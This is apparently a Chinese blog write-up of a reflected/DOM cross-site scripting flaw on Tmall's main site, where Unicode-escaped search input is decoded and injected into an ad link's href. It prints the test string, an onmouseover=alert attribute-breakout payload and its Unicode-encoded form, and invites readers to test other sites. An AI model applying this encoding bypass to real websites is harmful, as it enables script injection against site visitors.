天猫商城主站xss

Posted 2021-04-29 me记录

天猫商城主站

天猫商场主站存在xss

问题出现在后端接口接受unicode编码以后的代码并且很自觉的把代码还原了

测试代码：

Mannix

UNICODE编码：

\u004d\u0061\u006e\u006e\u0069\u0078

天猫商城搜索框处

全站搜索关键字Mannix

搜索到了就可能存在问题

<a class="c2016-8-131194-1500868191213-imglink" target="_blank" href="https://XXXX.com/cc_im?p=Mannix&amp;s=1552844546&amp;k=441&amp;e=BsKIKHGKxSk0CzO0ax6IHElc689Lvc6qqBnLwaYYJgrAJJMNA76mkB8GJ5byYRVHZZlWF%2F7eENxmqp2zAS88wP8%2F%2BzaxGn%2BrB3%2BKDa%2B5WKlNEHgOYrzJPbOMoKIyFo%2FIZCrQ%2F7N92tV%2Fw7NVexlS5DqJS7MwtuGmGwAJy7VqHKjIb20tzFh0cVoFvi%2F5g1KSgjIGkAVGq5nP%2FDjHPi8Gc2sEha9XaGnJP09JNCkAftFHOcdSRMOUJTlnfqaNsbss7t4pPjcOJTiVAl0ijAm60wX2sFTpI8q1LYhSRb4erhSEkeTeFCKdj8WyN04DpgrmarFHNMcSJ%2F8%2BXR17q9UOiEow3HcN%2BSnEVTypeybBfYi%2F59bvZ7%2FcZEt%2B37ftzUmfQYJWDw46D9l4fToeprpTyhD54Bfghhfb%2BQVGteBKF4aI7wIim%2BuJ4A%3D%3D" atpanel=",539888916712,,,p4p,1,p4p,2928278102," title="买1得雅漾胶囊21粒瘦身减肥药抗肥胖"><img ></a>

正常情况下构造事件弹窗即可

<a class="c2016-8-131194-1500868191213-imglink" target="_blank" href="https://xxx.com/cc_im?p=Mannix" onmouseover=alert(1) &amp;s=1552844546&amp;k=441&amp;e=BsKIKHGKxSk0CzO0ax6IHElc689Lvc6qqBnLwaYYJgrAJJMNA76mkB8GJ5byYRVHZZlWF%2F7eENxmqp2zAS88wP8%2F%2BzaxGn%2BrB3%2BKDa%2B5WKlNEHgOYrzJPbOMoKIyFo%2FIZCrQ%2F7N92tV%2Fw7NVexlS5DqJS7MwtuGmGwAJy7VqHKjIb20tzFh0cVoFvi%2F5g1KSgjIGkAVGq5nP%2FDjHPi8Gc2sEha9XaGnJP09JNCkAftFHOcdSRMOUJTlnfqaNsbss7t4pPjcOJTiVAl0ijAm60wX2sFTpI8q1LYhSRb4erhSEkeTeFCKdj8WyN04DpgrmarFHNMcSJ%2F8%2BXR17q9UOiEow3HcN%2BSnEVTypeybBfYi%2F59bvZ7%2FcZEt%2B37ftzUmfQYJWDw46D9l4fToeprpTyhD54Bfghhfb%2BQVGteBKF4aI7wIim%2BuJ4A%3D%3D" atpanel=",539888916712,,,p4p,1,p4p,2928278102," title="买1得雅漾胶囊21粒瘦身减肥药抗肥胖"><img ></a>

先来本地测试

本地测试成功

我们开始构造我们的代码

Payload：

" onmouseover=alert("Mannix")

UNICODE编码：

\u0022\u0020\u006f\u006e\u006d\u006f\u0075\u0073\u0065\u006f\u0076\u0065\u0072\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u004d\u0061\u006e\u006e\u0069\u0078\u0022\u0029\u0020

拿到网站去测试

其他网站和天猫是一样的思路，自行测试

但是，有一点，审查元素可以看到我们的代码，源码里面搜索不到

有兴趣的可以自行探究原因

难道是DOM型XSS？

深入研究一下，如果有人发现其中的原因，请告诉我哦.

本文概不负责